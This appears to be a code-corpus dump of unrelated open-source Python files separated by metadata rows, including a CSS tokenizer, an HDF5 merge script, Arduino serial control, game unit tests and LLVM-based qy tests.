cleanstring = re.compile(r'\\((\r\n)|[\n|\r|\f])').sub
def __init__(self, macros=None, productions=None, doComments=True):
"""
inits tokenizer with given macros and productions which default to
cssutils own macros and productions
"""
if type(macros)==type({}):
macros_hash_key = sorted(macros.items())
else:
macros_hash_key = macros
hash_key = str((macros_hash_key, productions))
if hash_key in _TOKENIZER_CACHE:
(tokenmatches, commentmatcher, urimatcher) = _TOKENIZER_CACHE[hash_key]
else:
if not macros:
macros = MACROS
if not productions:
productions = PRODUCTIONS
tokenmatches = self._compile_productions(self._expand_macros(macros,
productions))
commentmatcher = [x[1] for x in tokenmatches if x[0] == 'COMMENT'][0]
urimatcher = [x[1] for x in tokenmatches if x[0] == 'URI'][0]
_TOKENIZER_CACHE[hash_key] = (tokenmatches, commentmatcher, urimatcher)
self.tokenmatches = tokenmatches
self.commentmatcher = commentmatcher
self.urimatcher = urimatcher
self._doComments = doComments
self._pushed = []
def _expand_macros(self, macros, productions):
"""returns macro expanded productions, order of productions is kept"""
def macro_value(m):
return '(?:%s)' % macros[m.groupdict()['macro']]
expanded = []
for key, value in productions:
while re.search(r'{[a-zA-Z][a-zA-Z0-9-]*}', value):
value = re.sub(r'{(?P<macro>[a-zA-Z][a-zA-Z0-9-]*)}',
macro_value, value)
expanded.append((key, value))
return expanded
def _compile_productions(self, expanded_productions):
"""compile productions into callable match objects, order is kept"""
compiled = []
for key, value in expanded_productions:
compiled.append((key, re.compile('^(?:%s)' % value, re.U).match))
return compiled
def push(self, *tokens):
"""Push back tokens which have been pulled but not processed."""
self._pushed = itertools.chain(tokens, self._pushed)
def clear(self):
self._pushed = []
def tokenize(self, text, fullsheet=False):
"""Generator: Tokenize text and yield tokens, each token is a tuple
of::
(name, value, line, col)
The token value will contain a normal string, meaning CSS unicode
escapes have been resolved to normal characters. The serializer
escapes needed characters back to unicode escapes depending on
the stylesheet target encoding.
text
to be tokenized
fullsheet
if ``True`` appends EOF token as last one and completes incomplete
COMMENT or INVALID (to STRING) tokens
"""
def _repl(m):
"used by unicodesub"
num = int(m.group(0)[1:], 16)
if num < 0x10000:
return unichr(num)
else:
return m.group(0)
def _normalize(value):
"normalize and do unicodesub"
return normalize(self.unicodesub(_repl, value))
line = col = 1
# check for BOM first as it should only be max one at the start
(BOM, matcher), productions = self.tokenmatches[0], self.tokenmatches[1:]
match = matcher(text)
if match:
found = match.group(0)
yield (BOM, found, line, col)
text = text[len(found):]
# check for @charset which is valid only at start of CSS
if text.startswith('@charset '):
found = '@charset ' # production has trailing S!
yield (CSSProductions.CHARSET_SYM, found, line, col)
text = text[len(found):]
col += len(found)
while text:
# do pushed tokens before new ones
for pushed in self._pushed:
yield pushed
# speed test for most used CHARs, sadly . not possible :(
c = text[0]
if c in u',:;{}>+[]':
yield ('CHAR', c, line, col)
col += 1
text = text[1:]
else:
# check all other productions, at least CHAR must match
for name, matcher in productions:
# TODO: USE bad comment?
if fullsheet and name == 'CHAR' and text.startswith(u'/*'):
# before CHAR production test for incomplete comment
possiblecomment = u'%s*/' % text
match = self.commentmatcher(possiblecomment)
if match and self._doComments:
yield ('COMMENT', possiblecomment, line, col)
text = None # ate all remaining text
break
match = matcher(text) # if no match try next production
if match:
found = match.group(0) # needed later for line/col
if fullsheet:
# check if found may be completed into a full token
if 'INVALID' == name and text == found:
# complete INVALID to STRING with start char " or '
name, found = 'STRING', '%s%s' % (found, found[0])
elif 'FUNCTION' == name and\
u'url(' == _normalize(found):
# url( is a FUNCTION if incomplete sheet
# FUNCTION production MUST BE after URI production
for end in (u"')", u'")', u')'):
possibleuri = '%s%s' % (text, end)
match = self.urimatcher(possibleuri)
if match:
name, found = 'URI', match.group(0)
break
if name in ('DIMENSION', 'IDENT', 'STRING', 'URI',
'HASH', 'COMMENT', 'FUNCTION', 'INVALID',
'UNICODE-RANGE'):
# may contain unicode escape, replace with normal
# char but do not _normalize (?)
value = self.unicodesub(_repl, found)
if name in ('STRING', 'INVALID'): #'URI'?
# remove \ followed by nl (so escaped) from string
value = self.cleanstring('', found)
else:
if 'ATKEYWORD' == name:
try:
# get actual ATKEYWORD SYM
name = self._atkeywords[_normalize(found)]
except KeyError, e:
# might also be misplace @charset...
if '@charset' == found and u' ' == text[len(found):len(found)+1]:
# @charset needs tailing S!
name = CSSProductions.CHARSET_SYM
found += u' '
else:
name = 'ATKEYWORD'
value = found # should not contain unicode escape (?)
if self._doComments or (not self._doComments and
name != 'COMMENT'):
yield (name, value, line, col)
text = text[len(found):]
nls = found.count(self._linesep)
line += nls
if nls:
col = len(found[found.rfind(self._linesep):])
else:
col += len(found)
break
if fullsheet:
yield ('EOF', u'', line, col)
| gpl-3.0 | -3,785,011,545,157,365,000 | 41.851351 | 101 | 0.451567 | false | 4.901813 | false | false | false |
startcode/apollo | modules/tools/prediction/mlp_train/merge_h5.py | 1 | 2643 | #!/usr/bin/env python
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import glob
import argparse
import datetime
import numpy as np
import h5py
def load_hdf5(filename):
"""
load training samples from *.hdf5 file
"""
if not(os.path.exists(filename)):
print "file:", filename, "does not exist"
os._exit(1)
if os.path.splitext(filename)[1] != '.h5':
print "file:", filename, "is not an hdf5 file"
os._exit(1)
h5_file = h5py.File(filename, 'r')
values = h5_file.values()[0]
print "load data size:", values.shape[0]
return values
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'generate training samples\
from a specified directory')
parser.add_argument('directory', type=str,
help='directory contains feature files in .h5')
args = parser.parse_args()
path = args.directory
print "load h5 from directory:", format(path)
if os.path.isdir(path):
features = None
labels = None
h5_files = glob.glob(path + '/*.h5')
print "Length of files:", len(h5_files)
for i, h5_file in enumerate(h5_files):
print "Process File", i, ":", h5_file
feature = load_hdf5(h5_file)
if np.any(np.isinf(feature)):
print "inf data found"
features = np.concatenate((features, feature), axis=0) if features is not None \
else feature
else:
print "Fail to find", path
os._exit(-1)
date = datetime.datetime.now().strftime('%Y-%m-%d')
sample_dir = path + '/mlp_merge'
if not os.path.exists(sample_dir):
os.makedirs(sample_dir)
sample_file = sample_dir + '/mlp_' + date + '.h5'
print "Save samples file to:", sample_file
h5_file = h5py.File(sample_file, 'w')
h5_file.create_dataset('data', data=features)
h5_file.close()
| apache-2.0 | -8,108,443,370,418,419,000 | 32.455696 | 92 | 0.595157 | false | 3.875367 | false | false | false |
twitter/heron | integration_test/src/python/integration_test/topology/one_spout_multi_tasks/one_spout_multi_tasks.py | 2 | 1572 | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-docstring
from heronpy.api.stream import Grouping
from integration_test.src.python.integration_test.core import TestTopologyBuilder
from integration_test.src.python.integration_test.common.bolt import IdentityBolt
from integration_test.src.python.integration_test.common.spout import ABSpout
def one_spout_multi_tasks_builder(topology_name, http_server_url):
builder = TestTopologyBuilder(topology_name, http_server_url)
ab_spout = builder.add_spout("ab-spout", ABSpout, 3)
builder.add_bolt("identity-bolt", IdentityBolt,
inputs={ab_spout: Grouping.SHUFFLE},
par=1,
optional_outputs=['word'])
return builder.create_topology()
| apache-2.0 | 4,743,227,587,584,489,000 | 40.368421 | 81 | 0.741094 | false | 3.787952 | true | false | false |
webbhorn/Arduino-Switch-Controller | arduino/arduino.py | 1 | 2214 | #!/usr/bin/env python
import serial, time
class Arduino(object):
__OUTPUT_PINS = -1
def __init__(self, port, baudrate=9600):
self.serial = serial.Serial(port, baudrate)
def __str__(self):
return "Arduino is on port %s at %d baudrate" %(self.serial.port, self.serial.baudrate)
def output(self, pinArray):
self.__sendData(len(pinArray))
if(isinstance(pinArray, list) or isinstance(pinArray, tuple)):
self.__OUTPUT_PINS = pinArray
for each_pin in pinArray:
self.__sendPin(each_pin)
return True
def setLow(self, pin):
self.__sendData('0')
self.__sendPin(pin)
return True
def setHigh(self, pin):
self.__sendData('1')
self.__sendPin(pin)
return True
def getState(self, pin):
self.__sendData('2')
self.__sendPin(pin)
return self.__formatPinState(self.__getData())
def analogWrite(self, pin, value):
self.__sendData('3')
hex_value = hex(value)[2:]
if(len(hex_value)==1):
self.__sendData('0')
else:
self.__sendData(hex_value[0])
self.__sendData(hex_value[1])
return True
def analogRead(self, pin):
self.__sendData('4')
self.__sendPin(pin)
return self.__getData()
def turnOff(self):
for each_pin in self.__OUTPUT_PINS:
self.setLow(each_pin)
return True
def __sendPin(self, pin):
pin_in_char = chr(pin+48)
self.__sendData(pin_in_char)
def __sendData(self, serial_data):
while(self.__getData()!="what"):
pass
self.serial.write(str(serial_data))
def __getData(self):
return self.serial.readline().replace("\r\n","")
def __formatPinState(self, pinValue):
if pinValue=='1':
return True
else:
return False
def close(self):
self.serial.close()
return True
"""
def __del__(self):
#close serial connection once program ends
#this fixes the problem of port getting locked or unrecoverable in some linux systems
self.serial.close()
"""
| mit | 4,657,381,806,307,410,000 | 24.744186 | 95 | 0.555104 | false | 3.771721 | false | false | false |
clouserw/zamboni | mkt/websites/views.py | 1 | 1959 | from django.db.transaction import non_atomic_requests
from rest_framework.generics import ListAPIView
from rest_framework.permissions import AllowAny
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.search.filters import (PublicSearchFormFilter, RegionFilter,
SearchQueryFilter)
from mkt.search.forms import SimpleSearchForm
from mkt.websites.indexers import WebsiteIndexer
from mkt.websites.models import Website
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer
class WebsiteView(CORSMixin, MarketplaceView, ListAPIView):
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
serializer_class = WebsiteSerializer
model = Website
class WebsiteSearchView(CORSMixin, MarketplaceView, ListAPIView):
"""
Base website search view based on a single-string query.
"""
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
filter_backends = [PublicSearchFormFilter, RegionFilter, SearchQueryFilter]
serializer_class = ESWebsiteSerializer
paginator_class = ESPaginator
form_class = SimpleSearchForm
def get_queryset(self):
return WebsiteIndexer.search()
@classmethod
def as_view(cls, **kwargs):
# Make all search views non_atomic: they should not need the db, or
# at least they should not need to make db writes, so they don't need
# to be wrapped in transactions.
view = super(WebsiteSearchView, cls).as_view(**kwargs)
return non_atomic_requests(view)
| bsd-3-clause | -3,533,117,552,146,456,000 | 38.979592 | 79 | 0.720265 | false | 4.462415 | false | false | false |
rizumu/bootmachine | bootmachine/management/__init__.py | 1 | 3322 | # (c) 2008-2011 James Tauber and contributors; written for Pinax (http://pinaxproject.com)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
import os
import sys
import bootmachine
BOOTMACHINE_COMMAND_DIR = os.path.join(
os.path.dirname(bootmachine.__file__), "management", "commands"
)
class CommandNotFound(Exception):
pass
class CommandLoader(object):
def __init__(self):
self.command_dir = BOOTMACHINE_COMMAND_DIR
self.commands = {}
self._load_commands()
def _load_commands(self):
for f in os.listdir(self.command_dir):
if not f.startswith("_") and f.endswith(".py"):
name = f[:-3]
mod = "bootmachine.management.commands.%s" % name
try:
__import__(mod)
except:
self.commands[name] = sys.exc_info()
else:
mod = sys.modules[mod]
self.commands[name] = mod.Command()
def load(self, name):
try:
command = self.commands[name]
except KeyError:
raise CommandNotFound("Unable to find command '%s'" % name)
else:
if isinstance(command, tuple):
# an exception occurred when importing the command so let's
# re-raise it here
raise(command[0], command[1], command[2])
return command
class CommandRunner(object):
usage = "bootmachine-admin command [options] [args]"
def __init__(self, argv=None):
self.argv = argv or sys.argv[:]
self.loader = CommandLoader()
self.loader.commands["help"] = self.help()
def help(self):
loader, usage = self.loader, self.usage
# use BaseCommand for --version
from bootmachine.management.base import BaseCommand
class HelpCommand(BaseCommand):
def handle(self, *args, **options):
print("Usage: {}\n".format(usage))
print("Options:"
" --version show program's version number and exit\n"
" -h, --help show this help message and exit\n"
"Available commands:\n")
for command in loader.commands.keys():
print(" {}".format(command))
return HelpCommand()
def execute(self):
argv = self.argv[:]
try:
command = self.argv[1]
except IndexError:
# display help if no arguments were given.
command = "help"
argv.extend(["help"])
# special cases for bootmachine-admin itself
if command in ["-h", "--help"]:
argv.pop()
command = "help"
argv.extend(["help"])
if command == "--version":
argv.pop()
command = "help"
argv.extend(["help", "--version"])
# load command and run it!
try:
self.loader.load(command).run_from_argv(argv)
except CommandNotFound as e:
sys.stderr.write("{}\n".format(e.args[0]))
sys.exit(1)
def execute_from_command_line():
"""
A simple method that runs a ManagementUtility.
"""
runner = CommandRunner()
runner.execute()
| mit | -1,116,202,746,595,356,300 | 30.339623 | 90 | 0.54124 | false | 4.353866 | false | false | false |
DiCarloLab-Delft/PycQED_py3 | pycqed/utilities/pulse_scheme.py | 1 | 5469 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches
def new_pulse_fig(figsize):
'''
Open a new figure and configure it to plot pulse schemes.
'''
fig, ax = plt.subplots(1, 1, figsize=figsize, frameon=False)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return fig, ax
def new_pulse_subplot(fig, *args, **kwargs):
'''
Add a new subplot configured for plotting pulse schemes to a figure.
All *args and **kwargs are passed to fig.add_subplot.
'''
ax = fig.add_subplot(*args, **kwargs)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return ax
def mwPulse(ax, pos, y_offs=0, width=1.5, amp=1, label=None, phase=0, labelHeight=1.3,
color='C0', modulation='normal', **plot_kws):
'''
Draw a microwave pulse: Gaussian envelope with modulation.
'''
x = np.linspace(pos, pos + width, 100)
envPos = amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
envNeg = -amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
if modulation == 'normal':
mod = envPos * np.sin(2 * np.pi * 3 / width * x + phase)
elif modulation == 'high':
mod = envPos * np.sin(5 * np.pi * 3 / width * x + phase)
else:
raise ValueError()
ax.plot(x, envPos+y_offs, '--', color=color, **plot_kws)
ax.plot(x, envNeg+y_offs, '--', color=color, **plot_kws)
ax.plot(x, mod+y_offs, '-', color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='right', color=color)
return pos + width
def fluxPulse(ax, pos, y_offs=0, width=2.5, s=.1, amp=1.5, label=None, labelHeight=1.7,
color='C1', **plot_kws):
'''
Draw a smooth flux pulse, where the rising and falling edges are given by
Fermi-Dirac functions.
s: smoothness of edge
'''
x = np.linspace(pos, pos + width, 100)
y = amp / ((np.exp(-(x - (pos + 5.5 * s)) / s) + 1) *
(np.exp((x - (pos + width - 5.5 * s)) / s) + 1))
ax.fill_between(x, y+y_offs, color=color, alpha=0.3)
ax.plot(x, y+y_offs, color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='center', color=color)
return pos + width
def ramZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a Ram-Z flux pulse, i.e. only part of the pulse is shaded, to indicate
cutting off the pulse at some time.
'''
xLeft = np.linspace(pos, pos + sep, 100)
xRight = np.linspace(pos + sep, pos + width, 100)
xFull = np.concatenate((xLeft, xRight))
y = amp / ((np.exp(-(xFull - (pos + 5.5 * s)) / s) + 1) *
(np.exp((xFull - (pos + width - 5.5 * s)) / s) + 1))
yLeft = y[:len(xLeft)]
ax.fill_between(xLeft, yLeft+y_offs, alpha=0.3, color=color, linewidth=0.0)
ax.plot(xFull, y+y_offs, color=color)
return pos + width
def modZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a modulated Z pulse.
'''
return pos + width
def interval(ax, start, stop, y_offs = 0, height=1.5, label=None, labelHeight=None,
vlines=True, color='k', arrowstyle='<|-|>', **plot_kws):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = height + 0.2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(start, height+y_offs), posB=(stop, height+y_offs), arrowstyle=arrowstyle,
color=color, mutation_scale=7, **plot_kws)
ax.add_patch(arrow)
if vlines:
ax.plot([start, start], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
ax.plot([stop, stop], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
if label is not None:
ax.text((start + stop) / 2, labelHeight+y_offs, label, color=color,
horizontalalignment='center')
def interval_vertical(ax, start, stop, position, label=None, labelHeight=None,
color='k', arrowstyle='<|-|>', labeloffset: float = 0,
horizontalalignment='center'):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = (start+stop)/2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(position, start), posB=(position, stop), arrowstyle=arrowstyle,
color=color, mutation_scale=7)
ax.add_patch(arrow)
if label is not None:
ax.text(position+labeloffset, labelHeight, label, color=color,
horizontalalignment=horizontalalignment)
def meter(ax, x0, y0, y_offs=0, w=1.1, h=.8, color='black', fillcolor=None):
"""
Draws a measurement meter on the specified position.
"""
if fillcolor == None:
fill = False
else:
fill = True
p1 = matplotlib.patches.Rectangle(
(x0-w/2, y0-h/2+y_offs), w, h, facecolor=fillcolor, edgecolor=color,
fill=fill, zorder=5)
ax.add_patch(p1)
p0 = matplotlib.patches.Wedge(
(x0, y0-h/4+y_offs), .4, theta1=40, theta2=180-40, color=color, lw=2,
width=.01, zorder=5)
ax.add_patch(p0)
ax.arrow(x0, y0-h/4+y_offs, dx=.5*np.cos(np.deg2rad(70)),
dy=.5*np.sin(np.deg2rad(60)), width=.03, color=color, zorder=5)
| mit | -4,925,029,477,719,938,000 | 32.552147 | 89 | 0.585848 | false | 2.957815 | false | false | false |
TheWiseLion/pykhet | tests/game_tests.py | 1 | 5304 | import unittest
from pykhet.components.types import MoveType, Move, TeamColor, Orientation
from pykhet.components.types import Position
from pykhet.games.game_types import ClassicGame
class TestClassicGames(unittest.TestCase):
def setUp(self):
self.game = ClassicGame()
def tearDown(self):
self.game = None
def test_available_moves_classic(self):
sphinx_moves_silver = self.game.get(0, 0).get_moves(self.game)
sphinx_moves_red = self.game.get(9, 7).get_moves(self.game)
# Sphinx Only Has 1 Move
self.assertEquals(len(sphinx_moves_silver), 1)
self.assertEquals(len(sphinx_moves_silver), len(sphinx_moves_red))
pharaoh_moves_silver = self.game.get(5, 0).get_moves(self.game)
pharaoh_moves_red = self.game.get(4, 7).get_moves(self.game)
# three moves, zero rotations
self.assertEquals(len(pharaoh_moves_red), 3)
self.assertEquals(len(pharaoh_moves_red), len(pharaoh_moves_silver))
# Test Anubises
anubis_moves_silver = self.game.get(4, 0).get_moves(self.game)
anubis_moves_red = self.game.get(5, 7).get_moves(self.game)
# four move, two rotations
self.assertEquals(len(anubis_moves_red), 6)
self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver))
anubis_moves_silver = self.game.get(6, 0).get_moves(self.game)
anubis_moves_red = self.game.get(3, 7).get_moves(self.game)
# three moves, two rotations
self.assertEquals(len(anubis_moves_red), 5)
self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver))
# Test Scarabs
scarab1_moves_silver = self.game.get(4, 3).get_moves(self.game)
scarab1_moves_red = self.game.get(5, 4).get_moves(self.game)
# 4 moves, 1 swap, 2 rotations
self.assertEquals(len(scarab1_moves_silver), 7)
self.assertEquals(len(scarab1_moves_red), len(scarab1_moves_silver))
scarab2_moves_silver = self.game.get(5, 3).get_moves(self.game)
scarab2_moves_red = self.game.get(4, 4).get_moves(self.game)
# 5 moves, 2 rotations
self.assertEquals(len(scarab2_moves_silver), 7)
self.assertEquals(len(scarab2_moves_red), len(scarab2_moves_silver))
# Test Pyramids:
p1_silver = self.game.get(2, 1).get_moves(self.game)
p1_red = self.game.get(7, 6).get_moves(self.game)
# 6 moves, 2 rotations
self.assertEquals(len(p1_silver), 8)
self.assertEquals(len(p1_red), len(p1_silver))
p2_silver = self.game.get(6, 5).get_moves(self.game)
p2_red = self.game.get(3, 2).get_moves(self.game)
# 5 moves, 2 rotations
self.assertEquals(len(p2_red), 7)
self.assertEquals(len(p2_red), len(p2_silver))
p3_silver = self.game.get(0, 3).get_moves(self.game)
p3_red = self.game.get(9, 3).get_moves(self.game)
# 4 moves, 2 rotations
self.assertEquals(len(p3_red), 6)
self.assertEquals(len(p3_red), len(p3_silver))
p3_silver = self.game.get(0, 4).get_moves(self.game)
p3_red = self.game.get(9, 4).get_moves(self.game)
# 4 moves, 2 rotations
self.assertEquals(len(p3_red), 6)
self.assertEquals(len(p3_red), len(p3_silver))
p4_silver = self.game.get(2, 3).get_moves(self.game)
p4_red = self.game.get(7, 4).get_moves(self.game)
# 6 moves, 2 rotations
self.assertEquals(len(p4_red), 8)
self.assertEquals(len(p4_red), len(p4_silver))
p5_silver = self.game.get(7, 0).get_moves(self.game)
p5_red = self.game.get(2, 7).get_moves(self.game)
# 4 moves, 2 rotations
self.assertEquals(len(p5_silver), 6)
self.assertEquals(len(p5_red), len(p5_silver))
def test_destroy_pieces_classic(self):
self.game.apply_move(Move(MoveType.move, Position(2, 1), Position(2, 0)))
self.game.apply_laser(TeamColor.silver)
self.game.apply_move(Move(MoveType.move, Position(7, 6), Position(7, 7)))
self.game.apply_laser(TeamColor.red)
self.game.apply_move(Move(MoveType.rotate, Position(0, 0), Orientation.right))
self.game.apply_laser(TeamColor.silver)
self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)),
len(self.game.squares_with_pieces_of_color(TeamColor.red)) + 1)
self.game.apply_move(Move(MoveType.rotate, Position(9, 7), Orientation.left))
self.game.apply_laser(TeamColor.red)
self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)),
len(self.game.squares_with_pieces_of_color(TeamColor.red)))
def test_red_wins_classic(self):
self.game.apply_move(Move(MoveType.move, Position(0, 3), Position(0, 2)))
self.game.apply_move(Move(MoveType.move, Position(3, 2), Position(5, 2)))
self.game.apply_laser(TeamColor.silver)
self.assertEquals(self.game.winner, TeamColor.red)
def simple_silver_win(self):
pass
def test_same_number_moves(self):
red_moves = self.game.get_available_moves(TeamColor.red)
silver_moves = self.game.get_available_moves(TeamColor.silver)
self.assertEquals(len(red_moves), len(silver_moves))
| mit | 1,106,180,224,603,944,700 | 41.774194 | 89 | 0.643477 | false | 2.963128 | true | false | false |
takeshineshiro/heat | heat/common/timeutils.py | 1 | 2831 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utilities for handling ISO 8601 duration format.
"""
import datetime
import random
import re
import time
from heat.common.i18n import _
iso_duration_re = re.compile('PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$')
wallclock = time.time
class Duration(object):
'''
Note that we don't attempt to handle leap seconds or large clock
jumps here. The latter are assumed to be rare and the former
negligible in the context of the timeout. Time zone adjustments,
Daylight Savings and the like *are* handled. PEP 418 adds a proper
monotonic clock, but only in Python 3.3.
'''
def __init__(self, timeout=0):
self._endtime = wallclock() + timeout
def expired(self):
return wallclock() > self._endtime
def endtime(self):
return self._endtime
def parse_isoduration(duration):
"""
Convert duration in ISO 8601 format to second(s).
Year, Month, Week, and Day designators are not supported.
Example: 'PT12H30M5S'
"""
result = iso_duration_re.match(duration)
if not result:
raise ValueError(_('Only ISO 8601 duration format of the form '
'PT#H#M#S is supported.'))
t = 0
t += (3600 * int(result.group(1))) if result.group(1) else 0
t += (60 * int(result.group(2))) if result.group(2) else 0
t += int(result.group(3)) if result.group(3) else 0
return t
def retry_backoff_delay(attempt, scale_factor=1.0, jitter_max=0.0):
"""
Calculate an exponential backoff delay with jitter.
Delay is calculated as
2^attempt + (uniform random from [0,1) * jitter_max)
:param attempt: The count of the current retry attempt
:param scale_factor: Multiplier to scale the exponential delay by
:param jitter_max: Maximum of random seconds to add to the delay
:returns: Seconds since epoch to wait until
"""
exp = float(2 ** attempt) * float(scale_factor)
if jitter_max == 0.0:
return exp
return exp + random.random() * jitter_max
def round_to_seconds(dt):
"""Round a datetime to the nearest second."""
rounding = 0
if dt.microsecond >= 500000:
rounding = 1
return dt + datetime.timedelta(0, rounding,
-dt.microsecond)
| apache-2.0 | -6,785,138,763,645,567,000 | 29.771739 | 78 | 0.655245 | false | 3.759628 | false | false | false |
bsilverthorn/qy | src/qy/test/test_language.py | 1 | 8791 | """
@author: Bryan Silverthorn <[email protected]>
"""
import math
import numpy
import qy
from nose.tools import (
assert_true,
assert_false,
assert_equal,
assert_raises,
assert_almost_equal,
)
from qy import (
emit_and_execute,
Object,
)
def test_qy_python_no_arguments():
"""
Test the python() LLVM construct without arguments.
"""
executed = [False]
@emit_and_execute()
def _():
@qy.python()
def _():
executed[0] = [True]
assert_true(executed[0])
def test_qy_python_arguments():
"""
Test the python() LLVM construct with arguments.
"""
values = []
@emit_and_execute()
def _():
@qy.for_(8)
def _(i):
@qy.python(i)
def _(j):
values.append(j)
assert_equal(values, range(8))
def test_qy_python_exception():
"""
Test exception handling in the python() LLVM construct.
"""
class ExpectedException(Exception):
pass
def should_raise():
@emit_and_execute()
def _():
@qy.python()
def _():
raise ExpectedException()
assert_raises(ExpectedException, should_raise)
def test_qy_python_exception_short_circuiting():
"""
Test short-circuiting of exceptions in the python() LLVM construct.
"""
class ExpectedException(Exception):
pass
def should_raise():
@emit_and_execute()
def _():
@qy.python()
def _():
raise ExpectedException()
@qy.python()
def _():
assert_true(False, "control flow was not short-circuited")
assert_raises(ExpectedException, should_raise)
def test_qy_if_():
"""
Test the qy-LLVM if_() construct.
"""
bad = [True]
@emit_and_execute()
def _():
@qy.if_(True)
def _():
@qy.python()
def _():
del bad[:]
assert_false(bad)
@emit_and_execute()
def _():
@qy.if_(False)
def _():
@qy.python()
def _():
assert_true(False)
def test_qy_if_else():
"""
Test the qy-LLVM if_else() construct.
"""
bad = [True]
@emit_and_execute()
def _():
@qy.if_else(True)
def _(then):
if then:
@qy.python()
def _():
del bad[:]
else:
@qy.python()
def _():
assert_true(False)
assert_false(bad)
bad = [True]
@emit_and_execute()
def _():
@qy.if_else(False)
def _(then):
if then:
@qy.python()
def _():
assert_true(False)
else:
@qy.python()
def _():
del bad[:]
assert_false(bad)
def test_qy_for_():
"""
Test the qy-LLVM for_() loop construct.
"""
count = 128
iterations = [0]
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
@qy.python()
def _():
iterations[0] += 1
assert_equal(iterations[0], count)
def test_qy_break_():
"""
Test the qy break_() statement.
"""
count = 64
iterations = [0]
@emit_and_execute()
def _():
@qy.for_(count * 2)
def _(i):
@qy.python()
def _():
iterations[0] += 1
@qy.if_(i == count - 1)
def _():
qy.break_()
assert_equal(iterations[0], count)
def test_qy_object_basics():
"""
Test basic operations on LLVM-wrapped Python objects.
"""
result = [None]
text = "testing"
def do_function(string_py):
result[0] = string_py
@emit_and_execute()
def _():
do = Object.from_object(do_function)
string = Object.from_string(text)
do(string)
assert_equal(result, [text])
def test_qy_py_print():
"""
Test the py_print() LLVM construct with arguments.
"""
import sys
from cStringIO import StringIO
old_stdout = sys.stdout
try:
new_stdout = StringIO()
sys.stdout = new_stdout
@emit_and_execute()
def _():
qy.py_print("test text\n")
finally:
sys.stdout = old_stdout
assert_equal(new_stdout.getvalue(), "test text\n")
def test_qy_py_printf():
"""
Test the py_printf() LLVM construct with arguments.
"""
import sys
from cStringIO import StringIO
old_stdout = sys.stdout
try:
new_stdout = StringIO()
sys.stdout = new_stdout
@emit_and_execute()
def _():
@qy.for_(8)
def _(i):
qy.py_printf("i = %i\n", i)
finally:
sys.stdout = old_stdout
assert_equal(
new_stdout.getvalue(),
"".join("i = %i\n" % i for i in xrange(8)),
)
def test_qy_nested_for_():
"""
Test the qy-LLVM for_() loop construct, nested.
"""
count = 32
iterations = [0]
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
@qy.for_(count)
def _(_):
@qy.python()
def _():
iterations[0] += 1
assert_equal(iterations[0], count**2)
def test_qy_assert_():
"""
Test the qy-LLVM assert_() construct.
"""
# should not raise
@emit_and_execute()
def _():
qy.assert_(True)
# should raise
from qy import EmittedAssertionError
def should_raise():
@emit_and_execute()
def _():
qy.assert_(False)
assert_raises(EmittedAssertionError, should_raise)
def test_qy_random():
"""
Test the qy-LLVM random() construct.
"""
count = 4096
total = [0.0]
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
v = qy.random()
